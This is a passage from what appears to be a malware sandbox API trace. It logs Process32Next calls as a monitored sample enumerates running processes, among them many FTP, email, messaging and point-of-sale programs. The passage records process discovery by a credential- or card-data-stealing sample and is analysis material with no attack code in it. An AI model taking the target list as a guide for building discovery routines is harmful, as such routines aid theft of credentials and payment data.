th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0222.476] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0222.478] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0222.519] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0222.521] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.522] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0222.524] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0222.525] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0222.527] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0222.528] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.530] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0222.531] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0222.533] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0222.534] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0222.536] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0222.537] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0222.539] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0222.541] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0222.544] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0222.545] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0222.547] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0222.548] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0222.550] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0222.552] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0222.553] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0222.592] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0222.594] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0222.596] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0222.597] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0222.599] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0222.601] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0222.602] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0222.605] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0222.607] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0222.609] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0222.611] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0222.613] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0222.616] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0222.617] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0222.619] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0222.621] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0222.623] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0222.625] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0222.668] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0222.671] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0222.673] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0222.675] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0222.677] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0222.679] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0222.681] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0222.683] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0222.685] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0222.686] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0222.695] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0222.697] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0222.699] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0222.701] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0222.703] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0222.705] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0222.707] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0222.708] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0222.729] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0222.731] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0222.733] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0222.735] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0222.737] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0222.739] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0222.741] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0222.743] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0222.745] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0222.747] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0222.749] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0222.751] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0222.753] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0222.755] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0222.761] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0222.764] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0222.766] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0222.768] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0222.897] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0222.899] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0222.901] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0222.902] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, 